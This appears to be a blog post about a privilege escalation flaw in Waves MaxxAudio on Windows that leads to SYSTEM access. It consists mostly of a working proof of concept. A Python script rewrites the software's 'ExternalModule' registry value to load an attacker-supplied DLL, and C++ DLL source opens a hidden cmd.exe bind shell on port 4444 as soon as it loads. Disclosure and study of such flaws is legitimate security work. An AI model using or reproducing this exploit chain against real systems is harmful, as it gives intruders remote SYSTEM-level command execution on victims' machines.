Waves Maxx Audio LPE to System (Windows)

October 28, 2019 Leave a comment

Write Up: VerSprite | Waves Maxx Audio
Advisories: VerSpriteCVEDETAILS

Comments: This vulnerability exploited can lead to SYSTEM privileged access on the compromised device. I am not sure why “CVEDETAILS” is rating this with a CVSS of only 4.4 when the other LPE to system is a 7.7….

python WavesMaxxAudio-PoC.py

import sys
import winreg
 
def set_registry(src,value_name,value_data):
    registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, src, 0, winreg.KEY_WRITE |
    winreg.KEY_WOW64_64KEY)
    winreg.SetValueEx(registry_key, value_name, 0, winreg.REG_SZ, value_data)
    winreg.CloseKey(registry_key)
    return True
 
def read_registry(src,value_name):
    registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, src, 0, winreg.KEY_READ |
    winreg.KEY_WOW64_64KEY)
    value_data, value_type = winreg.QueryValueEx(registry_key, value_name)
    winreg.CloseKey(registry_key)
    return value_data
 
def main():
    if(len(sys.argv) < 2):
        print("Incorrect usage.\nUsage: WavesMaxxAudio-PoC.py <path_to_malicious_dll>")
        sys.exit(0)
 
    user_malicious_dll_path = sys.argv[1]
    reg_value_data = user_malicious_dll_path + ";KblCoefsRender51164.dll;MaxxAudio5"
    reg_src = r"SOFTWARE\Waves Audio\MaxxAudio\General"
    reg_value_name = "ExternalModule"
 
    print("[!] PoC for Waves MaxxAudio LPE")
    
    print("[*] Reading Current registry key value:")
    print(read_registry(reg_src,reg_value_name))
    
    print("[*] Writing malicious key value now")
    set_registry(reg_src,reg_value_name,reg_value_data)
 
    print("[*] Overwrite Finished:\n[*] Reading new key value data now")
    print(read_registry(reg_src,reg_value_name))
 
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('Interrupted')
        sys.exit(0)

Malicious DLL

#include "stdafx.h"
#include <thread>
#include <shellapi.h>
#include <winsock2.h>
 
#pragma comment(lib,"ws2_32")
 
void bind_shell() {
 
    WSADATA wsaData;
    SOCKET sock;
    struct sockaddr_in sin;
 
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
 
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons((u_short)4444);
 
    bind(sock, (SOCKADDR*)& sin, sizeof(sin));
    listen(sock, SOMAXCONN);
 
    SOCKET tmp = accept(sock, 0, 0);
    STARTUPINFO si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
 
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = (HANDLE)tmp;
    si.hStdError = (HANDLE)tmp;
    si.hStdInput = (HANDLE)tmp;
 
    TCHAR commandLine[256] = L"cmd.exe";
    CreateProcess(NULL, commandLine, 0, 0, true, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
 
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(tmp);
 
    return;
}
 
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    bind_shell();
    return TRUE;
}

Leave a Reply

Your email address will not be published. Required fields are marked *